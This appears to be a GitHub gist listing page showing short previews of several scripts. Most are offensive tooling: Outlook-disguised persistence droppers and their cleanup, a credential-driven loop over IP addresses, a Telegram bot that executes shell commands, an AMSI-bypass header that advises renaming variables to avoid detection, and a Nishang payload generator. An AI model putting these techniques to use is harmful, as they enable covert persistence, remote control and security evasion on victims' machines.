This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Dir = "$($env:USERPROFILE)\Appdata\Local\temp" | |
$File = "$($env:COMPUTERNAME).tmp" | |
$ExeFile = "calc.exe" | |
$Url = "http://127.0.0.1:80" | |
$IcoFile = "microsoft-outlook.ico" | |
$SharpADS = "SharpADS.exe" | |
$ADSexe = "ADS.exe" | |
$ADSico = "ADS.ico" | |
$ADSvbs = "ADS.vbs" | |
$LnkFile = "OutlookUpdate.lnk" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Dir="C:\ProgramData\Outlook" | |
$ExeFile = "notmalicious.exe" | |
$VbsFile = "CheckUpdate.vbs" | |
$LnkFile = "Outlook.lnk" | |
$IcoFile = "microsoft-outlook.ico" | |
## Unhidden and delete files from Dir | |
cmd /c "dir /a $Dir" | |
attrib -h $Dir\$ExeFile | |
attrib -h $Dir\$VbsFile |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Url = "http://127.0.0.1:8080" | |
$Dir="C:\ProgramData\Outlook" | |
$ExeFile = "notmalicious.exe" | |
$VbsFile = "CheckUpdate.vbs" | |
$LnkFile = "Outlook.lnk" | |
$IcoFile = "microsoft-outlook.ico" | |
## Create directory | |
echo "Creating directory $Dir" | |
mkdir $Dir |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Source: https://gist.githubusercontent.com/aziza-kasenova/3aea2160cbaebc5a4ba1b9219cba612e/raw/32b3801369ce669b2b1bf89ca84d24f23b487579/AES256.go | |
package main | |
import ( | |
"bytes" | |
"crypto/aes" | |
"crypto/cipher" | |
"encoding/base64" | |
"fmt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
ip_list_file = "" | |
user = "" | |
domain = "" | |
password = "" | |
ip_list = open(ip_list_file).read().splitlines() | |
for ip_address in ip_list: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Script to download videos hosted in Wistia by right-clicking the video and pasting the “Copy link and thumbnail” info as the 1st parameter of this script | |
# The 2nd parameter is optional, the video name. Working at March of 2022, it downloads the video with higher quality | |
# Syntax: | |
# python3 wistia_downloader.py 'copied info with right click' 'file name' | |
# Example with the video from https://wistia.com/: | |
# python3 wistia_downloader.py '<p><a href="https://wistia.com?wvideo=vhkqhqhzyq"><img src="https://embedwistia-a.akamaihd.net/deliveries/48f1d62d1ceddb4284ad9cf67c916235.jpg?image_play_button_size=2x&image_crop_resized=960x540&image_play_button=1&image_play_button_color=fa4fa0e0" width="400" height="225" style="width: 400px; height: 225px;"></a></p><p><a href="https://wistia.com?wvideo=vhkqhqhzyq">The video hosting platform made for B2B marketers | Wistia</a></p>' "test.mp4" | |
import requests | |
import json | |
import bs4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
abad | |
abadias | |
abascal | |
abdel | |
abdelkader | |
abderrahaman | |
abdeselam | |
abellan | |
abselam | |
acosta |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Installation: pip3 install python-telegram-bot | |
# Usage: /cmd COMMAND | |
# Examples: /cmd whoami, /cmd ls -la, /cmd echo "a" > a.txt | |
from telegram.ext import Updater, CommandHandler | |
from telegram.ext.dispatcher import run_async | |
import subprocess | |
# Fill with your token after creating a bot using @BotFather | |
token = "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Based on Rasta Mouse (@_RastaMouse)'s blogs: | |
# - https://rastamouse.me/blog/asb-bypass-pt2/ | |
# - https://rastamouse.me/blog/asb-bypass-pt3/ | |
# - https://rastamouse.me/blog/asb-bypass-pt4/ | |
# | |
# Note: If it starts being detected change the variables names | |
# | |
# Usage: | |
# . .\amsi_bypass.ps1; [TestNameSpace.test]::Disable() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# Based on tothi's file: https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58 (I just updated the payload) | |
# The payload is generated with Nikhil Mittal(@samratashok)'s Nishang https://github.com/samratashok/nishang | |
# | |
import sys | |
import base64 | |
def help(): |